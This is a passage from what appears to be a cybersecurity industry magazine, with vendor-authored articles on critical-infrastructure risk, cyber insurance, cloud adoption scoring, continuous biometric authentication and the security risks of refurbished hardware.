Great Salt Lake flooded over the states of Nevada and Arizona. A cybersecurity attack on the Hoover

Dam could do just that and there are similar concerns for many major utility companies that house

thousands of gallons of oil and water.

One well-planned attack on a water, oil, or gas company could spell trouble for an entire region of the

country, impacting communities, businesses and schools, costing millions—even billions—of dollars in

loss and recovery. In a recent study by Gartner, cyber attackers will have weaponized operational

technology (OT) environments to successfully harm or kill humans by 2025.

There are, however, ways to avoid the consequences of an attack. Recently, 1898 & Co. made a drastic

push to keep OT environments safe, partnering with the Idaho National Laboratory, a U.S. Department

of Energy national laboratory, to apply the patent-pending consequence-driven, cyber-informed

engineering (CCE) discipline to protect the most critical aspects of utilities; oil, gas and chemicals;

pipelines; defense industrial base; transportation; ports and maritime; and manufacturing companies. It’s

a strategy we recommend to everyone. The key to handling attacks is prevention. With OT integration,

we can keep our homeland organizations safe and secure.

About the Author

Matt Morris is a digitalization and cybersecurity

executive and author, currently serving as the

managing director for 1898 & Co., where he leads

a diverse team of ICS cybersecurity

practitioners. His mission is to serve humanity by

improving safety, security, and reliability of the

world’s critical infrastructure through resiliency,

improved situational awareness and

preparedness.

An industry luminary, Matt previously spearheaded

ICS cybersecurity programs at Cisco, Siemens,

and NexDefense. At Cisco, Matt architected and

led the world’s first managed industrial cyber security service, among other major achievements. Matt

has 26 years of strategy and technology leadership.

Matt is a highly sought-after speaker on ICS cybersecurity and an accomplished author. He has been

published in SecurityWeek, USA Today, FoxNews.com, International Business Times, CIO Insights, CIO

Review, and many other notable publications.  Matt is a Certified CISO (C|CISO), holds 12 DHS ICS-

CERT certifications and a MBA degree from Emory Goizueta Business School. For more information,

visit https://1898andco.burnsmcd.com/

In the lead up to Russia’s invasion of Ukraine in February, the FBI and Department of Homeland Security

issued warnings of urgent cyberattack threats against U.S. and Ukrainian governmental and commercial

networks. As recently as April 18th, a top U.S. cybersecurity official told “60 Minutes” that Vladimir Putin

likely would resort to digital warfare resulting in a cyberattack on American targets. These warnings

highlight the dire circumstances being faced worldwide as the Russian invasion continues to cause

significant damage to Ukraine’s internet infrastructure, promulgating the need for coordinated and bold

responses.

But, putting politics aside, the reality is any business that interacts with and/or depends on the internet is

a target, regardless of size. Cyber criminals’ methods have become increasingly more sophisticated,

and their ability to launch IT-directed attacks occurs with seeming impunity. As a result, the negative

repercussions for businesses cannot be overstated. Indeed, potential targets are no longer limited to

those that have personally identifiable information, personal health information or customer credit card

data. Some of the largest cyberattacks over the last two years have not involved the mining of such

information at all. Rather, these attacks have either shut down or materially interrupted vital infrastructure,

Not Slowing Down

The Continuous Threat of Cyber Misconduct and its Impact on Global Industry

By Kimberly Patlis Walsh, President and Managing Director of Corporate Risk

Solutions (CRS)

health systems, financial companies, and manufacturing, including construction, supply chains,

distribution, and sales.

The impact of these attacks can take any number of forms, including: malware, including but not limited

to, ransomware (which disables the ability to access IT-systems until a ransom is paid); business

interruption (income lost because of the inability to access systems); data restoration (reconstructing

“lost” company and customer data); social engineering/phishing (loss of money based on the

impersonation of a colleague, client or vendor); regulatory fines and penalties; liability to third-parties if

their information is compromised; and reputational harm. Estimates for losses for these events runs from

$20 billion in ransomware costs alone for 2021 up to $10.5 trillion (or $20 Million per minute) expected to

be lost/spent by 2025 to respond, address and fight these attacks globally.

According to the Cybersecurity and Infrastructure Agency (CISA), the FBI and the NSA, the ongoing

success of these ransomware attacks has only further encouraged cyberthieves around the globe and

should put businesses of every size on high alert throughout 2022.

Specifically, CISA has advised that ransomware attackers are focusing their attention on critical

infrastructure industries throughout the US, including:

• Emergency water services

• Energy sector

• Communications

• Financial services

• Healthcare sector

Despite these grim predictions, it is imperative to remember that there are myriad tools available to

protect businesses against and mitigate the impact of cyber-related events.

Internal Security Protocols / Controls

Cybersecurity experts have identified many of the key vulnerabilities that criminals manipulate to enter

computer systems, and how to fix them, including:

• Multi-factor authentication tools to safely access internal computer systems

• Robust Desktop Security Protocols, including virtual private networks, data encryption, complex

passwords, firewalls, and restricted access to admin rights

• Active management of systems and configurations

• A continuous hunt for network intrusions and third-party exposure threats

• Update and upgrade software immediately

• Develop and exercise a system recovery plan, including regular testing of backups for data

integrity and restorability and preparing and annually testing of incident response/ business

continuity plan

System and Information security is the primary key to mitigating cyber-related risks. Whether through in-

house personnel, engaging with outsourced cybersecurity firms or having those teams work in tandem,

many vulnerabilities can and should be addressed as an enterprise-wide project. While there is no “one

size fits all” approach to this, and it is a true investment of capital and manpower, it is imperative that

companies do an initial assessment of their cybersecurity policies and procedures. The biggest mistake

companies make in this context is believing that they are not a target because of their industry, their size,

their revenues, or their footprint. Everyone is a target, and, as such, these issues simply cannot be

ignored.

Insurance

Another key mitigation tool is purchasing a dedicated cyber insurance policy. This allows businesses to

transfer first party loss (e.g., loss to the company itself) and third-party indemnity (e.g., liability claims

against the company and regulatory proceedings) risks associated with cyber-related security breaches.

A robust cyber policy is structured around helping the company recover and handle the costs associated

with an attack and best protecting the company’s reputation. The purchase of insurance will often also

act as a catalyst for implementing the tools and processes described above as cyber insurance carriers

are increasingly demanding that most, if not all, of the items described above be in place (or be on track

to be put in place) before they even issue a quote outlining the costs and coverages potentially available.

As part of the underwriting process, carriers will analyze possible risks pertaining to the company; the

strength of IT and cybersecurity controls; compliance with legal and industry standards; and the existence

and strength of a security response plans. It is vital that companies be transparent during this application

and review process, so issues do not arise in the event of a claim. Misrepresentations of material facts

requested by insurance underwriters, in this context especially with respect to cyber processes and

procedures, have led to voided coverage when such misrepresentations came to light following the notice

of a claim to the carrier. No insurance policy is worth the premium paid if it is not available in the event of

a loss.

As ransomware and other cyber security threats continue to create profound financial and operational

interruptions affecting businesses and insurance companies worldwide, it is imperative to seek an

independent risk advisor who can serve as a soundboard and navigate through the various and sudden

risks facing enterprises globally to ensure maximum recovery of data, systems and monies.

About the Author

Kimberly Patlis Walsh is President and Managing Director at

Corporate Risk Solutions.

Kimberly Patlis Walsh brings over 20 years of insurance

underwriting, program structuring, and multinational client risk

advisory representation to her Corporate Risk Solutions (CRS)

engagements. Prior to joining CRS in 2003, Kimberly served as

SVP of AIG’s Mergers & Acquisitions Group, structuring

insurance & financial solutions to a variety of corporations

(publicly traded and privately held) to limit or transfer liabilities

within corporate transactions, recapitalizations, bankruptcies

and other M&A situations. She is active in both the alternative

investment community as well as the insurance and risk community.

https://crslimited.com/

Advantage- Disadvantage Analysis for Implementing

Cloud Services

Which Methodology Do You Use to Make the Right Decision?

By Zsolt Baranya, Information Security Auditor, Black Cell Ltd.

Numerous organizations are thinking about introducing cloud-based systems or cloud services. The

decision is rather difficult and complex because of the advantages and disadvantages. Usually, the

decision makers' main arguments are the higher availability and the reduced IT operations cost compared

to an on-premises architecture.

There are legal requirements and recommendations describing the importance of advantage-

disadvantage analysis. There is no uniform / formalized methodology to conduct the analysis, which offer

a criteria system or decision process.

First, the organization must identify all the legal rules in the cloud service introduction to know the exact

requirements. These obligations can vary greatly from country to country. There are mandatory and

discretionary requirements, that the organization shall consider. The decision on the cloud

implementation shall primarily depend on the mandatory requirements.

There are many organizations - subsidiary/affiliate - which depend on the parent company in the usage

of cloud-based services. In this situation the possibilities for implementing a cloud usage depends on the

parent organization.

Considering all the circumstances, the organizations need a methodology or a criterion to make the right

decision. The following list and criteria may help to your organization. Each question has a score, which

is based on the priority of the question. If you finish providing the answers, you gain an aggregated score

on the advantage side and the disadvantage side. The aggregated scores can help the decision makers.

The scores (values) are only recommendations. These can be changed due to the special needs of the

organization.

No.

Question

Advantage

Disadvantage

Score

Is management committed to using cloud services? If

not, the whole project can fail.

Yes

Organizational cloud service usage rules sholud

implemented easily? In case of the procedures and/or

the rules of the organization are overly different form

the procedures and rules of the cloud service

(provider) can make the implementation inapplicable.

Yes

1,9

Is the information security policy of the organization

allowing the usage of cloud services? This is a

relatively easy decision to change the policy, if the first

questions answer is yes.

Yes

1,5

Does a contract prohibit the use of the cloud service?

If yes, do you have a possibility to negotiate with the

partner to change it? If the contract’s content can not

be changed, the value of the disadvantage is as

follows.

Yes

1,9

Is the cloud service appropriate to handle business

needs? It is an important question, but the business

has to understand the operation and functionality of

the service provided by the cloud service provider.

Yes

1,8

Is the cloud service suitable for the efficient

implementation of organizational cost allocation?

Many organization have a cost allocation system. If the

cloud can not handle (or not capable to handle) the

needs, the answer is no.

Yes

Does the IT experts possess specific knowledge to

operate cloud services? There are many cloud

trainings available, if the IT staff requires further

Yes

1,7

education, therefore this part of the introduction is

manageable.

Are there any legal or other legislative obligation,

which can limit the using of cloud services? If yes, the

organization have take into account the legislative

actions.

Yes

Is the data migration relatively easy and securely

feasible? If it’s not, you have the possibility to establish

a full back plan, or other plans if some confusion

appears.

Yes

1,8

Is the cloud solution compatible with organizational

architecture elements? If it’s not, to handle this will be

more expensive.

Yes

1,9

Is it possible to establish an Exit strategy or not (in

case of unique cloud solution)? The establishment of

a good Exit strategy is very complicated. There are

many possible scenario which the organization can

not anticipate.

Yes

1,9

Could the service implementation costs be cheaper

than the operational costs of the on premise solution?

The exact amounts are required to answer properly.

Yes

Do you need to further develop the cloud service or it

is available as a compact service?

Compact

Yes

Developing

1,8

Can the cloud service’s technical implementation be

considered risky (interfaces, encription etc.)? With the

help of a qualified risk management team, the risk

mitigation process will cover all difficulties.

Yes

1,7

Does the cloud provider and service have relevant

certificates? Without certification, you have to make

sure that it complies with your information security and

data protection standards by conducting audit.

Yes

1,7

Does the reporting function available that the cloud

service use support the deceision making process? It

is important for the managers but not exactly relevant

for the operators. If the answer is no, you have to find

the work-around solution to handle the problem.

Yes

1,5

The cloud service provider that you want to deploy

recently published an incident? It is a good indicator, if

the cloud service provider publish incidents, but it

should be considered what was the incident and what

kind of failure could cause it.

Yes

1,6

Could the management of a cloud service take more

time than operating an on premise system? More

estimated time, more money.

Yes

1,8

Will the usage of the cloud service be based on a

contract or placed under general terms and

conditions? If it based on contract, than the answer is

yes. Therefore you have a possibility to include

individual needs in the contract.

Yes

1,6

Aggregated scores

The methodology represented above promulgates the pre-implementation assessment process by

providing a solution to analyze the advantages and disadvantages of cloud service implementation. In

practice, many organization-specific situations could occur, that cannot be divided along the lines of a

yes/no answer. If a situation like this arises, it is advisable to collect the arguments from both sides.

To utilize the methodology in the best way possible, determining the scores in advance of providing the

answers for the questionnaire is crucial. If the aggregated scores come up equally at the end of the

analysis, the decision makers could rely on the unique results and debates of each question above.

I hope this methodology can help to make the right decision!

About the Author

Zsolt Baranya is an Information Security Auditor and head of

compliance of Black Cell Ltd. in Hungary. Formerly, he has been in

information security officer and data protection officer roles at a local

governmental organization. He also worked as a senior desk officer at

National Directorate General for Disaster Management, Department

for Critical Infrastructure Coordination, where he was responsible for

the Hungarian critical infrastructures’ information security compliance.

Zsolt can be reached at zsolt.baranya@blackcell.io and at his

company’s website https://blackcell.io/

Reshape Security and Embrace Cyber

Resilience with Hillstone Networks

By Timothy Liu, CTO & Co-founder, Hillstone Networks

Hillstone is a leader in infrastructure protection. We offer a trusted, and cost-effective unified platform for

end-to-end visibility, intelligence, and control. In a post-breach world where enterprise security is being

reshaped by the reality that attacks and security compromises are a matter of “when” and not “if,” Hillstone

can help customers achieve cyber resilience by detecting and isolating attacks and facilitating rapid

recovery. Hillstone’s comprehensive security suite addresses emerging threats and serves to mitigate

enterprise-wide risks while supporting mobility and work-from-anywhere initiatives.

Our approach, proven at over 23,000 enterprises worldwide, helps CISOs and security teams meet the

challenges of:

• An evolving threat landscape - Hillstone’s integrated network detection and response (NDR)

and extended detection and response (XDR) platforms tie together internal observations and

alerts with external threat intelligence to create a holistic and comprehensive view of an

organization's evolving attack surface and security posture, enabling deeper insight and

increased ability to spot hard-to-locate and sophisticated multi-layer, multi-stage attacks.

• Rapid infrastructure expansion - Hillstone offers complete protection across branch locations,

employee homes, campus networks, and cloud data centers. Edge protection suites including

software-defined wide area networking (SD-WAN), and zero-trust network access (ZTNA),

complementing our industry-leading next-generation firewalls (NGFW). Hillstone’s cloud workload

protection platform (CWPP) extends across virtual machines (VMs), containers, and serverless

application infrastructure, covering today’s and tomorrow’s enterprise workloads.

• Growing regulations and compliance demands - Increasing security and compliance

mandates can be met through Hillstone’s extensive solutions that serve any location, protect any

platform, and any application hosted anywhere. Manage security risks within enterprises with

complete user, application, and device visibility to see everything regardless of location.

• Limited budgets, talent recruitment challenges - Hillstone’s comprehensive solution suites,

augmented with AI/ML and threat feeds, can deploy and scale access controls and visibility into

today's dynamic datacenters, applications, clouds, and mobility architectures. The accuracy of

our solutions and ability to correlate across multiple data sources helps reduce alert fatigue and

threat paralysis, enabling higher productivity and increased job satisfaction for overworked

security personnel. Our integrated solution reduces the overhead of managing multiple

management systems from disparate vendors, improving productivity and reducing burden on

security teams while improving total-cost-of-ownership.

By creating our solutions with the methodology of “see, understand, act”, we place a concerted effort on

showing security teams how we are transitioning their security toward cyber-resiliency. We want them to

be able to feel the impact and feel like they have a grasp of what’s happening. Examples of this can be

seen by our duo inclusion in both Gartner Peer Insights, and our classification as a Visionary in Gartner’s

Magic Quadrant for Network Firewalls. The visionary qualification shows we have security that works

from a legitimacy and analytical perspective. Our Peer Insights qualification shows we have security

products that function simply and easily for security teams around the world.

About the Author

Timothy Liu is Co-Founder and Chief Technology Officer of

Hillstone Networks. In his role, Mr. Liu is responsible for the

company’s product strategy and technology direction, as well

as global marketing and sales. Mr. Liu is a veteran of the

technology and security industry with over 25 years of

experience. Prior to founding Hillstone, he managed the

development of VPN subsystems for ScreenOS at NetScreen

Technologies, and Juniper Networks following its NetScreen

acquisition. Mr. Liu is also a co-architect of the patented

Juniper Universal Access Control and holds an additional

patent on Risk Scoring and Risk-Based Access Control for

NGFW. In his career, Mr. Liu has served in key R&D positions

at Intel, Silvan Networks, Enfashion and Convex Computer. He Liu holds a Bachelor of Science from the

University of Science and Technology of China and a Ph.D. from the University of Texas at Austin.

Tim can be reached online at @thetimliu and at our company website https://www.hillstonenet.com/

There's been no shortage of criticism around President Biden’s new $773 billion defense budget. That’s

no surprise, as federal budgets always draw attention – and provide ample opportunity for political

posturing and finger-pointing – regardless of the actual figures involved.

Numbers aside, when it comes to America's cyber defense, we should do our best to put partisanship on

the shelf and seek multilateral ways to ensure our cybersecurity is strong and resilient.

Such concern extends far beyond the federal government: Ransomware and other criminal cyberattacks

against targets like K-12 schools, municipalities, universities, and every conceivable private-sector

industry are all on the rise, so we’re not faced solely with nation-state cyber warfare. In fact, criminal

gangs have been waging war on consumer data and personally identifiable information (PII) for some

time now. During the pandemic, threat actors took advantage of our increased vulnerability through global

Moving Beyond Budget Battles: The Real

Secret to Improving National Cyber Defenses

By Teddra Burgess, SVP, Public Sector, Tanium

supply chains by ramping up threats and expanding attack vectors, which we believe will continue to

climb throughout 2022.

The war in Ukraine has catalyzed interest in cyber readiness. But even those of us who have been

preparing for cyber war over the last several decades are now reevaluating our toolkits to ensure

complete preparedness should we need to engage in a full-scale cyber conflict. Cyber warfare may be a

relatively new type of war but preparing for it should be no less urgent than preparing for physical combat.

To do that, there are four major components of cyber preparedness that government agencies and

military branches should address: intention, cyber hygiene, controls, and people.

Why Intention Matters

When Dwight Eisenhower gave his landmark speech on the dangers of the military industrial complex,

he spoke of the need to find agreement on contentious issues and to exercise good judgement by striving

for balance and seeking progress. He astutely remarked that the lack of good judgement eventually leads

to imbalance and, unsurprisingly, frustration—a sentiment that’s all too familiar to modern-day chief

information security officers (CISOs) charged with keeping their organizations—whether public or

private—secure in the face of shifting attack vectors.

The past two decades have given rise to a thriving cybersecurity industrial complex not unlike

Eisenhower’s military one. Yet despite the Hydra-like growth of security vendors, the thousands of new

capabilities that purport to control for risk levels, and the attendant rise in spending on security-related

products and services, attack vectors keep growing. As they grow, they contribute to often unnecessary

spending to maintain an already costly security infrastructure.

As a result, it’s important to rethink and retool the solutions we have and the approaches we use to better

understand what our current security investments are delivering, whether their results are still relevant,

and what gaps still exist. Do we have proper controls in place? Can we scale in real or near-real time to

meet challenges as they surface? Are our existing tools truly delivering on their promises? At the end of

the day, it’s crucial that organizations think through and continuously assess their tech stack or they’ll

find they’re not only wasting budget, but risking much more.

We're behind in some areas and can do better; we are not as prepared globally as we might be. But we

do have strong cybersecurity leadership and the right intentions to meet today’s challenges. Attacks today

are more complex, layered, and targeted. Threat actors have shut down meat packing plants, disrupted

critical infrastructure, and ransacked government agencies. We’re now also facing the implications of

nation-state cyberattacks; the potential disruption of satellites and communications systems, of utilities

like water, oil, and electricity. There are threats to physical and cyber defenses as well as the potential

onslaught of misinformation campaigns designed to cause chaos and confusion. Nothing is off the table:

Attackers will strike wherever it hurts us the most.

President Biden’s budget proposal is a step in the right direction, but debate continues around whether

it’s big enough and where the dollars are going. That’s where intention gives way to results.

Getting back to basics

Hackers don’t need brute-force tactics to break into network and data assets: they can, and often do,

con employees into doing the dirty work for them. Government agencies are rightly focused on decreasing

these risks, reducing technology complexity, achieving better compliance, and doing whatever else it

takes to prevent sensitive data breaches.

But that’s not enough. Agencies must first understand what lives in their own environments: What are

their IT assets? How many devices connect to their agency? How many servers? What’s on the network?

What’s in the cloud? What tools are configured on devices and other endpoints? Are the tools configured

correctly? Can they see absolutely everything in their environments and make real-time changes with up-

to-the-second data?

If there’s even a whiff of uncertainty about the number of assets or the software that runs on them, tech

leaders must perform a comprehensive risk assessment. There’s no way to protect what you don’t know

you have, so teams must inventory and validate all IT and security assets.

It may help to keep in mind that 79 percent of organizations recently surveyed report widening visibility

gaps in their cloud infrastructure, while 75 percent found the same problem across end-user and IoT

devices. Similar gaps exist across federal, state, and local agencies, making it imperative for them to

know their assets intimately — including every piece of software that runs on them at any given point in

time.

After an agency has absolute clarity into its assets, the next step is to secure all its endpoints, whether

laptops, PCs, or virtual machines in the cloud, using prevention-first solutions. If agencies approach

cybersecurity like much of the private sector does, focusing on detecting and responding to threats, or

trying to overcome basic deficiencies with tools, they will not keep their endpoints or their data secure.

An ounce of prevention is worth a pound of cure.

The final step, after an agency has identified and inventoried all its assets, is to continuously maintain a

clean, secure environment — and that means creating a process for updating software and deciding

who’s responsible for installing patches, for running vulnerability scans, and for determining how issues,

once discovered, are remediated.

There are an average of 50 common vulnerabilities and exposures discovered every day. Software

developers are constantly updating their code, which means that annual or even quarterly scans of

patches and updates just won’t cut it. Daily scanning won’t get the job done either, because a single scan

will miss the 49 others that surface every 24 hours. Agencies must continually seek out and identify blind

spots to stay genuinely protected.

Compliance fails without proper controls

Mastering the basics of cyber hygiene boosts resilience across the board. When agencies get into the

habit of thinking that adhering to compliance standards alone provides security, they lose their cyber

resilience.

To ensure resilience, agencies must

establish controls in addition to compliance standards, while cyber

hygiene will include vulnerability patching, comprehensive asset management, user education, email

protections, and improving password habits. As the post- mortem of every breach shows, human error

almost always plays a role. Even compliance standards can't eliminate people from the equation. If

compliance alone can’t prevent an attack, it can’t be an agency’s security strategy either.

The good news is there's clear guidance for agencies looking for direction on exactly what controls to put

in place. From the National Institute of Standards and Technology (NIST) to the Department of Homeland

Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA), there are countless free

resources for those seeking best practices, tools, and frameworks to set them on a path to success.

To succeed in cybersecurity, diversify the team

With all our many shortcomings, humans remain a critical component in the defense against threat actors.

As the cyber landscape evolves, IT and security teams must also evolve. Cybersecurity teams must use

creative problem solving and diverse ideas and tactics to meet emerging threats. Unfortunately, limited

viewpoints create a barrier to a team’s ability to mitigate and respond to attacks comprehensively.

Teams are stronger when they leverage the power of their similarities as well as their differences.

Problem solving, strategic planning, and innovation all benefit from diversity and inclusion. Importantly,

diversity drives innovation. As Dr. Telle Whitney, a computer scientist and pioneer on the issue of women

in technology, said, “When we limit who can contribute, we in turn limit what problems we can

solve.” Wise words that point to a fundamental challenge we’re now facing, one that can and must be

solved if we don’t wish to stifle innovation.

Gender diversity has proven critical for organizations of all types across decision-making, problem

solving, and collaboration. Gender diverse companies are 21 percent more likely to have above average

profitability, and companies employing an equal number of men and women manage to deliver up to 41

percent higher revenue. Diverse teams are 87 percent better decision-makers than individuals. Research

suggests that gender diversity efforts could boost the global GDP by $28 trillion if the global workforce

became equally gender-diverse by 2025.

Budgets only matter as much as the intentions behind them. Republicans and democrats can debate line

items for months to come, but that would be wasted time when we consider our current cyber threat

landscape. We have the right tools at our fingertips to improve public sector cyber preparedness – it’s

just a matter of getting those tools in the hands of the right people and putting the controls in place to

ensure they don’t fail. President Biden was right on at least one point: “We need everyone to do their part

to meet one of the defining threats of our time.” Our vigilance and urgency today can prevent – or at least

lessen the severity of – attacks tomorrow.

About the Author

Teddra Burgess is the Senior Vice President, Public Sector

at Tanium, and is a seasoned expert with over two decades

of broad industry expertise. Over the course of her career,

Teddra has been instrumental to the success of several high-

profile technology companies including Hewlett Packard,

Micro Focus International, CA Technologies, SAI Global, and

ASG Technologies where she served as VP of Northeast and

US Federal Sales.

An advocate for advancing women+ and people of color in

technology, Teddra joined Pipeline Angels, an organization

changing the face of angel investing by creating capital for

women+ founders, as an independent investor in 2019. In

2020, she earned an Executive Certificate in DE&I from Cornell University, and is active in a variety of

community and professional organizations including Women in Technology, AFCEA, the NAACP and

Mocha Moms, Inc. She is also a member of Delta Sigma Theta Sorority, Inc.

Teddra can be reached online at Email: tanium@highwirepr.com, Twitter: @teddratburgess, LinkedIn:

https://www.linkedin.com/in/teddrathomasburgess/ and at our company website http://www.tanium.com/.

Continuous Biometric Authentication Tool

Against Account Takeovers

Introducing Graboxy Sentinel

By Tamas Zelczer, CEO, Cursor Insight

Twenty years ago, it was much more likely to have your identity stolen out in the physical world, but today

it happens online. Account takeover (ATO) attacks have been surging dramatically in recent years as

cybercriminals sharpen their skills and become increasingly sophisticated in their techniques.

In 2020, in a world thrown into remote work, attempted fraudulent logins increased by 282%. The situation

has only become worse since then. According to the Identity Theft Resource Center's annual report, data

breaches rose by 68% in 2021 and 36% percent of businesses have experienced a security incident

because of remote workers' actions.

One of the most effective strategies to protect your business from corporate account takeover attacks is

to enhance your authentication process. Stolen credentials become useless when hackers are confronted

with authentication prompts that they are unable to pass.

Traditional authentication techniques are easily outsmarted by cybercriminals, making those inadequate

for robust fraud prevention. Organizations should start thinking more strategically about protecting their

sensitive data and critical systems. They also need to choose a sustainable and adaptive cybersecurity

solution that will work both now and in the future.

One-time authentication methods only provide security at given times. Deploying 2FA or MFA during

like initiating a bank transfer, paying with a card, or getting access to sensitive corporate data.

Furthermore, one-time authentication techniques are easy to hack, and once the cybercriminal has

access, there is nothing to stop them.

Continuous authentication, on the other hand, runs in the background and does not require any extra

input from the user. It simply observes the user's behavior and activity while applying advanced

evaluation methods to identify them at a high frequency.

This means that authentication becomes a continuous process – anything the user does is an invisible

authentication challenge itself. Mouse movement dynamics, keystroke dynamics, and the user's digital

fingerprint (IP address, browser version, etc.) can all be used for continuous authentication.

Most behavioral biometric authentication systems are based on machine learning models. This allows

them to enhance the accuracy of authentication over time. The longer they can record data, i.e. monitor

user behavior, the more accurately they can recognize features and unique user traits, and the more

accurate the authentication will become.

Cursor Insight Ltd.'s Graboxy Sentinel is a new product that provides continuous biometric authentication

and protects enterprises from corporate account takeovers. It uses the company’s proprietary AI

technology to learn and analyze the users’ cursor movements, that are just as unique as handwriting.

If the real-time cursor movement analysis shows a divergence from the user’s biometric profile, Graboxy

Sentinel flags the fraudulent user accessing the account. Flagged users can be locked out or re-verified

using traditional multi-factor authentication methods.

https://vimeo.com/694347500

Embed version:

<div style="padding:56.25% 0 0 0;position:relative;"><iframe

src="https://player.vimeo.com/video/694347500?h=b41ff280fe&badge=0&autopause=0&amp

;player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture"

allowfullscreen style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Graboxy -

Sentinel"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Graboxy Sentinel is a versatile cybersecurity tool and can be used with enterprise accounts, home offices

for remote work, or online banking and payment services.

We’re not suggesting you should completely throw away all your existing authentication methods. One-

time authentication should be used for login. But passwords alone are rarely enough. It’s worth adding

2FA or MFA for more safety. To maximize your security level, continuous authentication should be

deployed in the background during the user session. This combination of authentication techniques will

prevent you from any account takeover attack.

For more information about continuous authentication and Graboxy Sentinel, visit sentinel.graboxy.com.

About the Author

Tamas Zelczer is the CEO of the Cursor Insight. Tamas can be

reached online at tamas@cursorinsight.com and at our company

website https://sentinel.graboxy.com/.

More businesses than ever before are rethinking their approach to hardware acquisition. As carbon

footprints become more of a concern, an increasing number of businesses are thinking twice about buying

new hardware directly from manufacturers. Hardware retention also remains a sore point, with as many

as 59% of companies thought to throw out equipment before it reaches the end of its operational life.

Making a saving on pre-owned hardware isn't just cost-effective, it's also far better for the environment.

However, refurbished hardware presents specific cyber risks that need to be considered. Read on as we

explore these in more detail, along with an outline of the steps you can take to mitigate them.

What Security Risks Need to Be Considered?

You may be able to make considerable savings by purchasing refurbished hardware, but there are

several major risks involved that leave you open to cyberattacks and data breaches.

Deleted Files

Traces of a file can remain on a device long after it has been deleted. Although the file itself may no

longer be present in its original location, traces of it will remain elsewhere in the system. If these files

contain harmful malware, you're at constant risk of cyberattacks. If these files were installed onto a device

intentionally, these risks can be unleashed the moment you start using refurbished hardware.

A Guide to Mitigating the Cyber Risks

Posed by Refurbished Hardware

An insight into the cyber risks that are potentially posed when investing in refurbished

hardware, and an insight into how these potential risks can be prevented and/or tackled.

By Eloïse Tobler MSc, Ecommerce Supervisor, Wisetek

100

Keystroke Logging and Malware

Keylogging software is one of the most nefarious tools used by cybercriminals. Keyloggers are highly

effective at keeping track of your activities. These activity-monitoring programs allow hackers to access

a wealth of personal information. This can include usernames and passwords, payment information, as

well as your general browsing history. Unless you're actively looking for such software, its presence will

go undetected. By the time you realize there's an issue, sensitive data will be in the hands of the individual

who installed the keylogging software.

Malware is even more difficult. As with keystroke software, malware can monitor activities like internet

browsing. It may also install additional software cookies onto your device without you knowing. In the

worst-case scenario, malware can mine your hard drive for specific pieces of information. Some

malwares can even access microphones and webcams, presenting a significant security risk.

Cryptojacking Attacks

Mining for cryptocurrency requires considerable processing power, making it an infeasible venture for

many. It probably comes as no surprise that the crypto boom has brought with it unique cyber risks. If

you've recently purchased refurbished hardware, cryptojacking is something you should be looking out

for.

In short, criminals piggyback onto the processing power of your hardware and its electrical consumption

by installing malware on a device that mines for cryptocurrency. You might think this an unlikely scenario,

but in the first half of 2021, more than 51 million such attacks were detected. This is a marked increase

in attacks detected in 2020.

As with other types of malwares, crypto mining software can be hard to detect and largely goes unnoticed.

However, if your device is running at a considerably slow speed, it could be a sign that your hardware

has been compromised with crypto mining software.

How to Combat Cyber Risks with Refurbished Hardware

All of this might make for scary reading, but there are many steps you can take to mitigate risks when

using refurbished hardware. Many of these are easy to implement yourself.

Clearing Hard Drives

For starters, make sure the hard drive of a newly acquired piece of hardware has been wiped clean. Even

if a reseller has given you assurances that a hard drive has been wiped, there's no guarantee. The peace

of mind involved in carrying out a second hard drive wipe is priceless. Many data removals are readily

available precisely for this purpose. A full wipe will remove all files from a hard drive, as well as annihilate

any lingering data.

101

For maximum reassurance, you may decide to replace a hard drive entirely. However, when purchasing

replacement hard drives, it's vital you procure one from a trusted manufacturer. For newer hardware,

finding an affordable replacement should prove simple enough. However, if your refurbished devices are

no longer in production, you may struggle to find a suitable replacement.

Carry Out a BIOS Check and Update

Protecting the BIOS of a computer is crucial when it comes to cybersecurity. Without the BIOS, your

hardware can't function. Even if the hardware has been updated before being delivered to you, it's

important to install the most current version.

It's also worth investigating prospective hardware models ahead of purchasing them. Some devices are

more susceptible to BIOS attacks than others. Recently, it was discovered that as many as 30 million

Dell devices were at high risk of remote BIOS attacks from cybercriminals.

Cybersecurity Checklist for Refurbished Hardware

All of the above requires effort on your part. However, you can alleviate in-house pressures and concerns

about cybersecurity risks with due diligence before you buy. Carrying out a few basic checks before

making a payment will dramatically reduce the time and money you need to invest in mitigating

cybersecurity risks.

Only Buy from Certified Sellers

When you're eager to make a saving, it can be tempting to buy refurbished hardware from third-party

marketplaces. While these platforms do yield considerable savings, you're less protected when it comes

to warranties and refunds. In many cases, there's no guarantee that refurbished hardware has been

tested to ensure it's in full working order. If you must buy from one of these online marketplaces, only

purchase from legitimate sellers. The likes of eBay offer refurbished programs that only pre-qualified

vendors can use to sell goods. If you're buying refurbished hardware elsewhere, always check to see if

a vendor has original equipment manufacturer (OEM) certification.

Understand the Difference Between Refurbished and Recertified Hardware

This is important as far as warranties are concerned. Although the two terms are used interchangeably,

refurbished and recertified don't mean the same thing. The main difference here is the warranty attached

to the hardware. Refurbished products tend to include no warranties at all, meaning you have no buyer

protection. If the hardware doesn't perform as expected, you may find yourself having to swallow the

cost.

102

However, recertified products will come with at least a short-term warranty included. Regardless of what

banner a product is being sold under, read the fine print before finalizing a purchase. You'll want as long

a warranty as possible. If a product has been recertified, it should mean you're entitled to ongoing support

from the original manufacturer.

In Summary

Choosing refurbished hardware isn't just cost-effective, it's an easy way of ensuring your operation is as

sustainable as possible. However, cost savings and improved green credentials also leave you open to

cybersecurity risks that can't be ignored.

If you plan on using refurbished hardware, be vigilant when it comes to deleted files and software that

might still be lurking under the surface. Keystroke logging software and malware can be devastating to

your organization if not detected early enough. You also need to be aware of cryptojacking and other

emerging cybercrime trends.

Fortunately, mitigating cybersecurity risks is fairly effortless. Once your refurbished hardware has arrived,

ensure your IT teams wipe hard drives clean. Do this even if a seller has told you this has been taken

care of. When in doubt, absorb the cost of replacing hard drives entirely.

To make life easier, express caution before you buy. Only purchase refurbished hardware from certified

sellers and be extra vigilant when buying devices from third-party marketplaces. You'll also need to have

a handle on how refurbished hardware deviates from recertified hardware. Only certified hardware will

give you the luxury of extended warranties and continued support from the original manufacturer.

About the Author

Eloïse Tobler is the Ecommerce Supervisor of the Wisetek Store, which

was created to give customers access to high quality, reliable and

